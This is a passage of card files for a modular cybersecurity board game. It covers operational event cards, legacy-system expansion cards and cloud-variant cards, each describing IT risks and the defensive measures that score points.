Type: Outage Effect: Your email server dies mid-quarter. Choose one: - Repair: Pay 5 Budget (emergency callout) - Ignore: -10 points (email down all quarter; users furious) Mitigated By: A second Email Server, or email hosted on a Cloud Workload — the redundant/cloud service carries the load: no cost, no penalty No email service at all? Nothing to break — but you already have bigger problems (see Capability scoring)


EVT-02: Traffic Spike

Type: Load Effect: Your product goes viral overnight. Public services are hammered. - Prepared (Load Balancer, CDN, or a duplicated web service): +5 points (you rode the wave; sales boom) - Unprepared: -5 points (site down during your biggest day) Mitigated By: Load Balancer (8), CDN (expansion CLOUD-04), or redundant web hosting


EVT-03: Phishing Wave

Type: Attack Effect: A targeted phishing campaign hits every inbox in the company. - Email Gateway deployed: +5 points (campaign filtered; nice catch) - No Email Gateway: -10 points (three credential sets stolen) Mitigated By: Email Gateway (6)


EVT-04: Cloud Vendor Outage

Type: Outage Effect: Your cloud provider has a region-wide outage this quarter. - If any required business service runs only in the cloud: -5 points (service dark; SLA breached) - Cloud services with an on-prem twin, or no cloud usage: no effect Mitigated By: On-prem redundancy for cloud-hosted services, or an all-on-prem design Lesson: Cloud is cheap, but concentration risk is real


EVT-05: Budget Cut

Type: Finance Effect: Fiscal crisis. Lose 5 Budget immediately (to a minimum of 0). Mitigated By: Nothing — but teams holding a contingency reserve absorb it without changing plans


EVT-06: Emergency Funds

Type: Finance Effect: A surprise rebate lands. Gain +10 Budget (one time). Mitigated By: N/A (enjoy it)


EVT-07: Security Grant

Type: Finance Effect: A government cyber-resilience grant is available to organizations with recoverable backups. - Backup Server deployed: Gain +5 Budget - No Backup Server: Nothing (you don't qualify) Mitigated By: N/A — this one rewards good hygiene


EVT-08: File Server Filling Up

Type: Capacity Effect: Shared storage hits 98% full. Choose one this turn: - Add capacity: Deploy any server to host file storage, or overload an existing server (+1 Budget per extra service) - Ignore: -5 points (service degradation; work grinds) Mitigated By: Spare capacity anywhere in your design (assign file storage to it at no cost) No file storage service at all? No effect — and no file-storage capability either


EVT-09: Honeypot Triggers

Type: Attack (Detected?) Effect: Someone has been quietly probing your network. - Honeypot Decoy or Honeypot Network deployed: +5 points (intruder caught red-handed in the decoy; access cut) - No honeypot: Nothing visible happens. Nothing visible ever happens. (No penalty — this time) Mitigated By: N/A — this is deception's payday


EVT-10: Insider Snooping

Type: Attack Effect: An employee is browsing systems far outside their role. - SIEM deployed OR network segmentation in place: +5 points (caught early / blocked at the zone boundary) - Neither: -5 points (months of quiet data access before anyone notices) Mitigated By: SIEM (15) or Network Segmentation Switch (10) / segmented architecture


EVT-11: Ransomware Strikes

Type: Attack (Severe) Effect: Ransomware detonates on an internal system. - Backup Server deployed: Pay 3 Budget for restore effort; if you also have detection (IDS/IPS/SIEM), you contained it fast: +5 points - No Backup Server: -20 points (pay the ransom or lose the data — either way it's ugly) Mitigated By: Backup Server (9); detection reduces blast radius


EVT-12: IT Staff Burnout

Type: Operations Effect: The ops team is running on fumes. This turn you may deploy at most ONE component. (Handling the turn's Business Requirement with an already-deployed component is fine.) Mitigated By: Designs that are already complete — teams who front-loaded their build barely notice


EVT-13: Vendor Promotion

Type: Opportunity Effect: A security vendor is clearing stock. The next security device you deploy this turn costs 2 less (minimum cost 1). Mitigated By: N/A — pure opportunity; skip it if nothing on the list fits your design


EVT-14: New Hire Needs Remote Access

Type: Workforce Effect: A key new hire works from another city and starts Monday. - VPN Gateway deployed: No effect (onboarding is routine) - No VPN Gateway: -3 points (they quit in week two, or worse: they improvise) Mitigated By: VPN Gateway (9)


EVT-15: Hardware Recall

Type: Outage Effect: A vendor recalls a faulty component. Pick one of your on-prem servers (Threat Orchestrator picks if you won't): - Pay 3 Budget for expedited replacement, OR - That server is offline this quarter — any requirement it alone satisfies counts as unmet this turn Mitigated By: Redundant servers or cloud-hosted twins (the twin covers the outage: no cost, no penalty). All-cloud designs are unaffected


EVT-16: Quiet Quarter

Type: Respite Effect: Nothing breaks. Nobody attacks. Finance leaves you alone. Use the breathing room to review your gaps. Mitigated By: N/A


Event Card Summary

Card Event Effect (Unmitigated) Mitigated By
EVT-01 Email Server Failure Pay 5 or -10 pts Redundant/cloud email
EVT-02 Traffic Spike -5 pts (or +5 if ready) LB / CDN / redundant web
EVT-03 Phishing Wave -10 pts (or +5 if ready) Email Gateway
EVT-04 Cloud Vendor Outage -5 pts if cloud-only service On-prem redundancy
EVT-05 Budget Cut -5 Budget Contingency reserve
EVT-06 Emergency Funds +10 Budget
EVT-07 Security Grant +5 Budget if Backup
EVT-08 File Server Filling Up Buy capacity or -5 pts Spare capacity
EVT-09 Honeypot Triggers +5 pts if honeypot
EVT-10 Insider Snooping -5 pts (or +5 if ready) SIEM / segmentation
EVT-11 Ransomware Strikes -20 pts Backup (+ detection: +5)
EVT-12 IT Staff Burnout Max 1 deploy this turn Completed builds
EVT-13 Vendor Promotion Next device -2 cost
EVT-14 New Hire Remote Access -3 pts VPN Gateway
EVT-15 Hardware Recall Pay 3 or server offline Redundancy / cloud
EVT-16 Quiet Quarter Nothing

Gameplay Notes

Draw Rules

Design Tension

Events reward the same things the scoring rewards — redundancy, detection, backups, and a contingency reserve — so mitigation is never wasted spend. The nastiest cards (EVT-11) are exactly why hoarding zero-reserve builds and backup-free builds both hurt.


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by type:
  3. Red (Attack): EVT-03, EVT-09, EVT-10, EVT-11
  4. Orange (Outage/Capacity): EVT-01, EVT-04, EVT-08, EVT-15
  5. Blue (Finance/Operations): EVT-05, EVT-06, EVT-07, EVT-12
  6. Green (Opportunity/Respite): EVT-02, EVT-13, EVT-14, EVT-16
  7. Cut along dotted lines
  8. Shuffle into a single face-down deck for play

Network Building Standalone: Operational Event Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/network-building/expansion-deck/legacy-systems.md

Network Building Module: Legacy Systems (Expansion)

Version: 2.1 - Balanced & Refined Edition Last Updated: October 2025


Overview

Legacy System Cards extend the Network Building module with specialized systems that many organizations still operate but cannot easily patch or upgrade.


Legacy System Cards

LEGACY-01: Mainframe System

Type: Legacy Business-Critical Infrastructure Cost: 15 Budget (expensive to operate) Complexity: 4/4 (extremely complex, specialized expertise required) Availability Requirement: 99.95% (financial/mission-critical) Supported Operating System: Mainframe OS (z/OS, VSE, VM), Not patchable

Description: Large centralized mainframe computer running business-critical applications. Banks, insurance companies, government agencies, and utilities often depend on mainframes for core operations. Mainframes are designed for availability and stability, but security model is outdated (predates internet security concerns).

Key Characteristics: - Age: Often 20-30+ years old - Software: Custom applications written in COBOL or other legacy languages - Security: Perimeter security model (assume all internal traffic is trusted) - Expertise: Few experts remain (knowledge leaving the industry) - Vendor Support: Vendor may no longer exist; in-house expertise critical - Cost of Replacement: $5M-100M+ (impossible to replace)

Key Concerns: - No regular security patches available (vendor EOL) - Known CVEs published but cannot be patched - Legacy protocols (unencrypted connections, weak authentication) - Access control systems predate modern security standards - Directly connected to corporate network (not isolated) - Often contains entire organization's critical data - Business process depends on it (replacement would take years)

Defense Strategy (Cannot Fix, Must Isolate): - Network Isolation: Mainframe in restricted segment, minimal connectivity - Firewall Rules: Only authorized systems can connect to specific ports - Monitoring: SIEM must monitor all mainframe connections (detect anomalies) - Assumption of Breach: Assume mainframe will be compromised; defend everything else - No Direct User Access: Users should not directly access mainframe (access via secure application tier) - Log Aggregation: All mainframe activities logged centrally (immutable audit trail)

Network Interactions: - Requires: Firewall rules isolating mainframe - Requires: Network Segmentation to restrict access - Requires: SIEM monitoring for anomaly detection - Incompatible with: Direct internet access (perimeter firewall only) - Incompatible with: Cloud integration (data residency and connectivity issues)

Incident Response Impact: - If mainframe is compromised, entire organization may be compromised - Mainframe compromise may be immediate game-loss in Incident Response - Legacy authentication means attacker can move freely once inside - Mainframe contains sufficient data to be primary exfiltration target

Team Design Validation: - ✓ If including mainframe: must include Network Segmentation + Firewall - ✓ Must include SIEM for monitoring - ✗ Failure: Direct user access to mainframe increases risk - ✗ Failure: Cloud connectivity to mainframe violates security boundary


LEGACY-02: Custom Business Application

Type: Legacy Business-Critical Software Cost: 8 Budget (application licensing/support) Complexity: 3/4 (difficult to update or replace) Availability Requirement: 99% (business depends on it) Operating System: Windows Server 2008/2012, or older Linux, or proprietary OS

Description: Specialized business application written by external vendor or in-house team that is no longer maintained. Application may be: - Accounting system (custom financial software) - Manufacturing control system (production scheduling) - Insurance claims system - Legal case management system - ERP (Enterprise Resource Planning) system

The application is mission-critical but: - Vendor no longer provides updates (company went out of business, or stopped supporting) - Cost to replace: $500K-$5M+ (economically infeasible) - Business process deeply embedded in application (replacement would require major restructuring) - Knowledge of application is scarce (original developers left, documentation poor)

Key Characteristics: - Age: Often 10-20 years old - Language: Written in outdated languages (Visual Basic 6, old Java, COBOL) - Vendor: Vendor may no longer exist; purchased "as-is" - Customization: Heavily customized for organization (not standard product) - Expertise: Few people understand the code - Database: Proprietary or very old database (SQL Server 2005, Oracle 10g, etc.) - Integration: Deeply integrated into business workflow

Key Concerns: - Application may contain hardcoded credentials - Application may store passwords in plaintext - Application may use unencrypted connections to database - Application may have SQL injection vulnerabilities (pre-2005 development) - Application may lack audit logging - Upgrading operating system may break application - Patches to operating system may be incompatible with application - Security testing tools may break application

Defense Strategy (Isolate and Monitor): - Application Server Isolation: Application in restricted segment - Database Isolation: Application database encrypted and access-controlled - Network Firewall: Only users/systems needing application can access it - No Direct Internet Access: Application never exposed to internet - SIEM Monitoring: All application access logged and monitored - Assumption: Assume application has SQL injection or similar vulnerabilities; defend database - Access Control: Limit who can use application (risk vs. benefit analysis)

Network Interactions: - Requires: Application Server (SRV-06 or custom server) - Requires: Database Server isolated from other systems - Requires: Firewall rules limiting access - Requires: SIEM monitoring application access - Incompatible with: Cloud hosting (licensing, data residency issues)

Incident Response Impact: - Custom application vulnerability could be exploited for lateral movement - Application database compromise exposes sensitive business data - Application logs may be missing or inaccessible - Attacker may extract application source code

Team Design Validation: - ✓ If including custom application: must isolate application + database - ✓ Must limit user access (principle of least privilege) - ✓ Must monitor application access in SIEM - ✗ Failure: Direct internet access to application increases attack surface - ✗ Failure: Weak access controls allow unauthorized application access


LEGACY-03: Industrial Control System (ICS)

Type: Operational Technology (OT) / Safety-Critical Cost: 12 Budget (specialized equipment) Complexity: 4/4 (extremely specialized, safety implications) Availability Requirement: 99.9%+ (safety-critical, cannot fail) Operating System: Proprietary Industrial OS, real-time OS, or very old Linux

Description: Specialized system that controls physical machinery, manufacturing processes, power generation, utilities, or other critical infrastructure. Examples: - Manufacturing: Assembly line control, robotic systems - Utilities: Power distribution, water treatment, smart grid - Building Systems: HVAC, access control, fire systems - Transportation: Traffic signals, rail systems

Industrial Control Systems (ICS) are purpose-built for reliability and real-time control, not information security. They predate cybersecurity concerns.

Key Characteristics: - Purpose: Controls physical machinery or critical infrastructure - Real-time: Must respond in milliseconds (cannot tolerate latency) - Reliability: Designed for 99.99%+ availability - Security: Predates modern security (no authentication, no encryption) - Isolation: Historically air-gapped (not connected to corporate network) - Expertise: Requires specialized engineering expertise (electrical, mechanical, control systems) - Cost of Downtime: $10K-$1M+ per minute of downtime - Lifecycle: 10-30 year lifespan (different than IT systems)

Key Concerns (from IT Perspective): - Cannot be patched (real-time systems cannot tolerate OS updates) - Cannot tolerate intrusion detection (latency would affect operations) - Cannot install EDR/antivirus (would slow down real-time responses) - Cannot use modern encryption (adds latency) - Uses legacy protocols (Modbus, Profibus, DNP3 - no security built-in) - Often air-gapped; now being connected to corporate network (exposes vulnerability) - If compromised, physical safety implications (machinery malfunction, power outage, etc.)

Key Concerns (from ICS Perspective): - Availability is paramount (security is secondary) - Adding security controls might affect uptime - ICS engineers don't understand IT security - IT security tools and practices may break ICS - ICS changes must be tested extensively (downtime is unacceptable)

Defense Strategy (Strict Isolation): - Never Connect to Corporate Network: ICS should remain air-gapped - If Connection Required: Use unidirectional gateway (ICS can send data out, nothing comes in) - Network Segmentation: ICS in completely isolated segment from corporate systems - No User Internet Access from ICS: ICS workstations cannot browse internet - Physical Security: ICS room locked, access restricted to authorized engineers - Monitoring: Use ICS-specific monitoring tools (not traditional SIEM) - Assumption: Assume ICS network will be compromised; focus on preventing spread to corporate

Network Interactions: - Isolation: Complete separation from corporate network (air-gapped preferred) - If Bridge Required: Unidirectional gateway (one-way data flow) - Incompatible with: Corporate firewall (ICS cannot tolerate intrusion detection latency) - Incompatible with: EDR/Antivirus (would slow down real-time control) - Incompatible with: Cloud integration (real-time latency requirements)

Incident Response Impact: - ICS compromise may cause physical safety issues (priority = physical safety over data) - ICS compromise may cause production shutdown (significant financial impact) - ICS security investigation requires specialized expertise (not standard IT) - ICS forensics may disrupt operations (cannot preserve evidence if it affects safety)

Team Design Validation: - ✓ If including ICS: must isolate ICS from corporate network - ✓ Must use unidirectional gateway if connectivity required - ✓ Must NOT install traditional IT security tools on ICS - ✗ Failure: Corporate network connected to ICS without isolation - ✗ Failure: ICS exposed to internet or untrusted networks - ✗ Failure: IT security tools degrading ICS real-time performance


LEGACY-04: Obsolete Operating System

Type: Legacy Infrastructure Running Unsupported OS Cost: 5 Budget (cheap hardware, but difficult to support) Complexity: 3/4 (difficult to manage with modern security tools) Availability Requirement: 80-95% (business can tolerate occasional downtime) Operating System Examples: Windows XP, Windows Server 2003, old Linux kernels, custom UNIX variants

Description: Systems running operating systems that are no longer supported by vendor or open-source community. Vendor has stopped releasing security patches. Public exploit code for known vulnerabilities exists and is freely available.

Examples: - Windows XP (support ended 2014) - Windows Server 2003 (support ended 2015) - Linux 2.4/2.6 kernels (EOL for 10+ years) - Solaris 8/9 (Sun Microsystems EOL) - Other commercial UNIX variants EOL decades ago

Key Characteristics: - Support: No security patches from vendor - Exploits: All known vulnerabilities are published (no zero-days) - Tools: Modern security tools often don't run on EOL OS - Compatibility: Cannot run modern applications - Patching OS: OS upgrade would break dependent applications - Cost of Replacement: Application replacement cost makes OS upgrade prohibitive

Key Concerns: - All known vulnerabilities can be exploited (no patches) - Public exploits readily available (trivial for attacker) - Modern malware often targets these systems (profitable attacks) - Ransomware frequently targets EOL systems (known vulnerabilities) - System cannot run modern antivirus/EDR (not compatible) - System cannot use modern encryption protocols - System is prone to exploitation for lateral movement into modern systems

Defense Strategy (Assume Compromise, Isolate): - Assumption: Assume EOL system will be compromised (all vulnerabilities are public) - Network Isolation: EOL system in restricted segment, minimal connectivity - Firewall Rules: Only necessary traffic to/from EOL system - No Lateral Movement: Firewall rules prevent movement from EOL system to others - No Sensitive Data: Do not store sensitive data on EOL system - Monitoring: SIEM monitors EOL system closely (detect compromise signs) - Replacement Planning: Have timeline to replace/upgrade EOL system - Physical Security: Restrict physical access to EOL system

Network Interactions: - Isolation: EOL system in isolated segment - Firewall: Strict firewall rules (default deny) - Monitoring: SIEM alerts on any unusual EOL system activity - No Cloud Access: EOL system does not connect to cloud systems - Air-gapped Preferred: If possible, keep EOL system air-gapped

Incident Response Impact: - EOL system compromise may be inevitable (all vulnerabilities public) - Attacker will target EOL system as entry point (easier than hardened systems) - EOL system may be used as staging point for attacks on hardened systems - Forensics on EOL system may be difficult (no modern forensics tools support it)

Team Design Validation: - ✓ If including EOL system: must isolate completely - ✓ Must have replacement timeline - ✓ Must NOT store sensitive data on EOL system - ✗ Failure: No network isolation for EOL system - ✗ Failure: Sensitive data on EOL system - ✗ Failure: EOL system has same network privileges as modern systems


Legacy Systems Card Summary

Card System Type Cost Complexity Key Challenge
LEGACY-01 Mainframe 15 4/4 Cannot patch, mission-critical
LEGACY-02 Custom Application 8 3/4 Vendor no longer exists
LEGACY-03 Industrial Control 12 4/4 Real-time + safety-critical
LEGACY-04 Obsolete OS 5 3/4 All vulnerabilities public

Design Philosophy

Key Principle: Cannot Fix, Must Isolate

Legacy systems cannot be fixed through normal security controls: - Cannot patch (vendor no longer supports) - Cannot upgrade OS (breaks dependent applications) - Cannot install modern security tools (incompatible) - Cannot redesign (cost prohibitive)

Instead, organizations must: 1. Isolate the legacy system: Separate network segment, strict firewall rules 2. Monitor closely: SIEM alerts on any anomalous activity 3. Assume compromise: Design defenses assuming legacy system will be compromised 4. Plan replacement: Have timeline to eventually replace legacy system 5. Limit exposure: Do not connect sensitive systems to legacy system network


Gameplay Impact

Network Design Complexity

Including legacy systems significantly increases network design complexity: - Must add firewall rules for each legacy system - Must add network segmentation - Must add SIEM monitoring - Budget is constrained (legacy systems are expensive to operate)

Incident Response Complications

If Incident Response follows Network Building: - Legacy systems are easier attack targets (known vulnerabilities) - Attacker will likely compromise legacy system first - Legacy system compromise may lead to lateral movement - Legacy system may lack proper logging (forensics is difficult)

Strategic Trade-off

Teams face strategic decision: Include legacy systems or avoid them? - Include Legacy Systems: Realistic, mirrors real organizations, adds challenge - Avoid Legacy Systems: Simpler network design, but unrealistic - Team Decision: Should reflect organization's actual legacy system situation


When to Use Legacy System Cards

Use in Network Building Expansion if:

Skip Legacy System Cards if:


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use color scheme indicating "difficult/expensive":
  3. Dark Red/Brown (Difficult): LEGACY-01, LEGACY-03
  4. Orange (Moderate): LEGACY-02, LEGACY-04
  5. Include warning icons (exclamation mark, caution symbol) on cards
  6. Cut along dotted lines
  7. Create a "Legacy System Reference Card" with isolation requirements and key facts

Possible Future Expansions

Additional Legacy System Cards: - LEGACY-05: Mainframe Tape Backup System (disaster recovery, retention archiving) - LEGACY-06: Proprietary Database System (custom data storage, vendor extinct) - LEGACY-07: Dedicated PBX Telephony System (VoIP not yet viable) - LEGACY-08: Custom SCADA System (industrial automation, not standard ICS)


Network Building Module: Legacy Systems (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.1 - Balanced & Refined Edition

cards/network-building/expansion-deck/cloud-variants.md

Network Building Module: Cloud Variants (Expansion)

Version: 2.1 - Balanced & Refined Edition Last Updated: October 2025


Overview

Cloud Variant Cards extend the Network Building module with advanced cloud deployment options and cloud-native technologies beyond the basic Cloud Workload card in the core deck.


Cloud Variant Cards

CLOUD-01: Containerized Microservices

Type: Cloud-Native Architecture Cost: 6 Budget (container orchestration platform) Complexity: 3/4 (requires Kubernetes expertise) Supported Platforms: AWS ECS, Azure Container Instances, Google Cloud Run, Kubernetes Application Type: Modern cloud-native applications built as multiple small services

Description: Applications broken into microservices running in containers (Docker). Each service is a separate container that can scale independently. Containers are orchestrated by a platform (Kubernetes, Docker Swarm, ECS).

Key Characteristics: - Services: Application broken into small, focused services - Containers: Each service runs in a container (isolated environment) - Orchestration: Platform automatically manages container deployment, scaling, and recovery - Scalability: Each service can scale independently based on demand - DevOps: Infrastructure and code are tightly integrated (Infrastructure as Code) - Cloud-Native: Built for cloud (ephemeral resources, auto-scaling, auto-healing)

Key Advantages: - Scalability: Auto-scale individual services based on load - Resilience: Container failure doesn't affect entire application - Efficiency: Containers share OS kernel (more efficient than VMs) - Velocity: Deploy microservices independently (faster development) - Cost: Pay only for resources used (serverless principles)

Key Concerns (Security Perspective): - Complexity: Many moving parts, many potential attack surfaces - Container Escape: Attacker in one container might escape to host - Supply Chain: Container images come from registries (may be compromised) - Secrets Management: Container needs credentials/API keys (risk of exposure) - Lateral Movement: Multiple containers in same cluster, network policies must isolate - Compliance: Tracing data across microservices complicated - Logging: Distributed across many containers (aggregation required)

Defense Strategy: - Container Runtime Security: Monitor and restrict container behavior (Falco, Sysdig) - Image Scanning: Scan images for vulnerabilities before deployment - Network Policies: Kubernetes network policies restrict inter-service communication - Pod Security Policies: Restrict what containers can do (no privileged escalation) - Registry Security: Scan images in registry, require signing - Secrets Vault: Use HashiCorp Vault or cloud native secrets (not environment variables) - SIEM Integration: Aggregate logs from all containers

Network Interactions: - Works with: Cloud-native architecture (ARCH-05) - Requires: Container orchestration platform (Kubernetes) - Requires: Container registry (Docker Hub, ECR, ACR, GCR) - Requires: Secrets management (HashiCorp Vault, AWS Secrets Manager) - Integrates with: Microservices architecture (multiple services)

Incident Response Impact: - Container compromise may be isolated (if network policies work) - Container escape would give attacker access to host - Supply chain attack on container images affects all deployments - Distributed nature makes forensics complex - Log aggregation essential for investigation

Team Design Validation: - ✓ If including microservices: must include container runtime security - ✓ Must include image scanning + signing - ✓ Must include network policies - ✓ Must include secrets management - ✗ Failure: Hardcoded secrets in containers - ✗ Failure: No image signing/scanning - ✗ Failure: No container network policies


CLOUD-02: Serverless/Function-as-a-Service

Type: Cloud-Native Compute (Abstracted Infrastructure) Cost: 3 Budget (minimal infrastructure management) Complexity: 2/4 (simple from ops perspective, but different security model) Supported Platforms: AWS Lambda, Azure Functions, Google Cloud Functions, IBM Cloud Functions Use Cases: Event-driven processing, API backends, scheduled jobs, data transformation

Description: Functions deployed to serverless platform. You write code, platform handles scaling, infrastructure, and execution. You pay only for actual execution time (milliseconds).

Key Characteristics: - No Infrastructure: You don't manage servers/containers/VMs - Event-Driven: Functions triggered by events (API call, message queue, schedule, etc.) - Auto-Scaling: Automatically scales from zero to thousands of concurrent executions - Stateless: Functions should not maintain state (state in database/message queue) - Time-Limited: Function has timeout (usually 15 minutes max) - Cost Model: Pay per execution millisecond (very cheap if infrequently called)

Key Advantages: - Simplicity: Write code, deploy, done (no servers to manage) - Cost: Pay only for execution time (not for idle servers) - Scalability: Automatic scaling without configuration - Velocity: Rapid deployment cycle (seconds) - Reduced Attack Surface: No server to compromise (provider manages infrastructure)

Key Concerns (Security Perspective): - Dependency Management: Function depends on libraries (vulnerable packages) - Secrets in Environment Variables: Function needs credentials (hardcoded or env vars) - Supply Chain: Libraries may be compromised (dependency attack) - Monitoring Blind Spot: Functions are ephemeral (logs must be aggregated) - Cold Start Attacks: Function startup time can leak information - Privilege Escalation: Function may have overly broad IAM permissions - Denial of Service: Function can be invoked repeatedly (cost/resource attack) - Compliance: Difficult to audit function execution (multi-tenant platform)

Defense Strategy: - Dependency Scanning: Scan dependencies for vulnerabilities - Secrets Management: Use cloud secrets manager (not environment variables) - IAM Least Privilege: Function has minimum required permissions - CloudTrail Logging: Log all function invocations - VPC Integration: Function connects to VPC if accessing private resources - Rate Limiting: Prevent function invocation DoS - Input Validation: Strict validation of all inputs (injection attacks) - Library Pinning: Pin exact library versions (prevent supply chain attacks)

Network Interactions: - Works with: Cloud-first architecture (ARCH-05) - Integrates with: API Gateway (exposes function as HTTP endpoint) - Integrates with: Message Queues (event-driven triggers) - Requires: Secrets Manager (for credentials) - Optional: VPC integration for private resource access

Incident Response Impact: - Function compromise is possible (code vulnerability or dependency) - Function invocation logs are critical (only audit trail) - Multi-tenant platform may complicate forensics - Dependency vulnerability affects all functions using vulnerable library - Distributed nature makes understanding attack chain difficult

Team Design Validation: - ✓ If including serverless: must include secrets management - ✓ Must include dependency scanning - ✓ Must include IAM least privilege configuration - ✗ Failure: Secrets in environment variables - ✗ Failure: Overly broad function permissions - ✗ Failure: No input validation


CLOUD-03: Database-as-a-Service (Managed Database)

Type: Cloud-Managed Data Layer Cost: 5 Budget (pay per GB + IO operations) Complexity: 1/4 (cloud provider manages infrastructure) Supported Platforms: AWS RDS, Azure SQL Database, Google Cloud SQL, MongoDB Atlas, DynamoDB Database Types: Relational (SQL Server, PostgreSQL, MySQL, Oracle), NoSQL (MongoDB, DynamoDB, Cassandra)

Description: Database managed entirely by cloud provider. You provision database capacity, cloud provider handles: backups, patching, failover, replication, encryption, monitoring.

Key Characteristics: - Managed: Cloud provider manages infrastructure (patches, backups, upgrades) - Automated Backup: Point-in-time recovery (no manual backup configuration) - Replication: Automatic geo-replication for disaster recovery - Encryption: Encryption at rest and in transit (built-in) - Scaling: Can scale storage and compute without downtime - Monitoring: Built-in monitoring and alerting - Compliance: Provider maintains compliance certifications (SOC 2, HIPAA, PCI-DSS)

Key Advantages: - Reliability: Provider manages availability (99.99% SLA typical) - Security: Provider manages patching and security updates - Compliance: Provider handles compliance certifications - Cost: No ops team needed to maintain database - Disaster Recovery: Automated backups and geo-replication - Scalability: Transparent scaling without downtime

Key Concerns (Security Perspective): - IAM Configuration: Database access via IAM roles (misconfiguration exposes data) - Network Exposure: Database may be internet-accessible (must restrict) - Encryption Keys: Cloud provider manages keys (limited control) - Audit Logging: Must enable audit logging (not always on by default) - Data Residency: Where is data stored geographically? - Backup Security: Backups must be encrypted and access-controlled - Supply Chain: Vendor is now part of attack surface - Multi-Tenant: Data may share hardware with other customers (trust model)

Defense Strategy: - Network Isolation: Database accessible only from application (not internet) - IAM Least Privilege: Only application has access (not human users) - Encryption Keys: Use customer-managed keys (not provider-managed) - Audit Logging: Enable all audit logging (schema changes, access, queries) - Monitoring: Set up alerting on suspicious queries (large exports, drops, etc.) - Backup Encryption: Verify backups are encrypted - Access Control: Disable public IP, use private endpoints only - Secrets Management: Database credentials in secrets vault (not hardcoded)

Network Interactions: - Works with: Cloud-first architecture (ARCH-05) or Cloud Hybrid (ARCH-04) - Integrates with: Application tier (via private endpoint) - Requires: Secrets management (for credentials) - Incompatible with: On-premises applications (latency/connectivity issues)

Incident Response Impact: - Database compromise likely primary attack goal (most valuable data) - Cloud provider manages baseline security (shifts responsibility model) - Audit logs are critical evidence (may be only forensics available) - Backup verification essential (can you restore to pre-attack state?) - Multi-tenant concerns for sensitive investigations

Team Design Validation: - ✓ If including managed database: must use private endpoints (not public) - ✓ Must enable audit logging - ✓ Must use customer-managed encryption keys - ✓ Must restrict database IAM permissions - ✗ Failure: Database public IP exposed to internet - ✗ Failure: Overly broad IAM permissions (anyone can access) - ✗ Failure: Audit logging disabled


CLOUD-04: Content Delivery Network (CDN)

Type: Edge Computing / Performance Enhancement Cost: 4 Budget (pay per GB transferred + requests) Complexity: 2/4 (configuration required, but well-documented) Supported Platforms: CloudFlare, AWS CloudFront, Azure CDN, Google Cloud CDN, Akamai Use Cases: Static assets (images, JS, CSS), web application acceleration, DDoS mitigation

Description: CDN caches content across globally distributed edge servers. When users request content, they get it from nearest edge server (fast). Reduces load on origin server and improves user experience.

Key Characteristics: - Distributed Caching: Content cached at 100+ edge locations worldwide - Fast Delivery: Users get content from nearest edge (milliseconds) - Origin Protection: Origin server behind CDN (hides IP, reduces load) - DDoS Protection: CDN absorbs DDoS attacks before reaching origin - SSL/TLS Termination: CDN handles encryption (origin can use HTTP) - Rate Limiting: Can rate-limit requests per IP - Security Headers: Can inject security headers (HSTS, CSP, etc.)

Key Advantages: - Performance: Content delivery 100x faster globally - DDoS Protection: Built-in DDoS mitigation - Security: Origin IP hidden, security scanning at edge - Cost Efficiency: Reduces origin server bandwidth costs - Geo-Location: Can route users to different content based on location

Key Concerns (Security Perspective): - Cache Poisoning: Attacker poisons CDN cache with malicious content - Origin Bypass: Attacker finds origin IP, bypasses CDN security - SSL Stripping: CDN can decrypt traffic (must trust CDN provider) - Cookie Security: Sensitive cookies may be cached (GDPR/privacy issue) - Personalization: Cached content loses personalization (may expose user data) - Configuration Mistakes: Wrong cache settings may cache sensitive content - Origin Protection: Still need to protect origin server (CDN is not complete solution) - Bot Attack: Attackers can still target origin through CDN

Defense Strategy: - Cache Settings: Do not cache sensitive content (set cache headers) - Origin Protection: Implement Web Application Firewall (WAF) on origin - Rate Limiting: Configure CDN rate limiting rules - DDoS Settings: Enable DDoS protection features - SSL Validation: Verify SSL certificates (prevent MITM) - Geoblocking: Block traffic from unwanted regions (geo-restrictions) - Security Headers: Implement security headers (HSTS, CSP, X-Frame-Options) - Origin IP Hiding: Use origin concealment (hide real IP) - Monitoring: Monitor for suspicious CDN patterns

Network Interactions: - Works with: Web application (static assets + dynamic content) - Works with: Cloud Hybrid (ARCH-04) or Cloud First (ARCH-05) - Complements: Web Application Firewall (WAF) - Optional with: Infrastructure (performance enhancement, not required)

Incident Response Impact: - CDN compromise could distribute malware to all users (supply chain attack) - Cache poisoning affects entire user base - Origin IP exposure could enable direct attacks on origin server - CDN logs are evidence (attacker activity visible in CDN analytics) - DDoS attack visibility (CDN shows attack patterns)

Team Design Validation: - ✓ If including CDN: must configure cache headers correctly - ✓ Must enable security features (DDoS, WAF, rate limiting) - ✓ Should hide origin IP - ✗ Failure: Caching sensitive/personalized content - ✗ Failure: Disabled security features - ✗ Failure: Origin IP exposed


Cloud Variants Card Summary

Card Technology Cost Complexity Primary Benefit
CLOUD-01 Microservices 6 3/4 Scalability & Velocity
CLOUD-02 Serverless 3 2/4 Simplicity & Cost
CLOUD-03 Managed DB 5 1/4 Reliability & Compliance
CLOUD-04 CDN 4 2/4 Performance & DDoS Protection

Design Philosophy

Key Principle: Different Cloud Services, Different Security Models

Each cloud variant represents different architectural choices: - Microservices: Scalability + complexity (many attack surfaces) - Serverless: Simplicity + different threat model (function-level security) - Managed Database: Reliability + shared responsibility (provider + customer) - CDN: Performance + edge computing (distributed security)

Organizations use combinations of these services: - Serverless functions backed by managed database (simple, scalable, reliable) - Microservices deployed globally via CDN (scalable, fast, available) - Mix of serverless and containers (different workloads, different approaches)


Gameplay Impact

Network Design Flexibility

Cloud variants add flexibility to network design: - Can build entirely on serverless (very simple, minimal infrastructure) - Can mix serverless + containers (different workloads) - Can add CDN for global distribution - Can use managed database for all data needs

Cost Considerations

Cloud variants have different cost models: - Serverless: Cheap if used occasionally, expensive if always running - Microservices: Scale-to-zero not available (always running cost) - Managed Database: Scale with usage (can get expensive) - CDN: Cheap for low traffic, expensive for high traffic

Complexity Trade-offs

Cloud variants trade operational complexity for different concerns: - Serverless: No ops burden, but security mindset different - Microservices: Ops burden (Kubernetes), but powerful scalability - Managed Database: No ops burden, but IAM misconfiguration risk - CDN: Config once, then mostly set-and-forget


When to Use Cloud Variants

Use in Network Building Expansion if:

Skip Cloud Variants if:


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by deployment type:
  3. Blue (Containers): CLOUD-01
  4. Green (Serverless): CLOUD-02
  5. Purple (Data): CLOUD-03
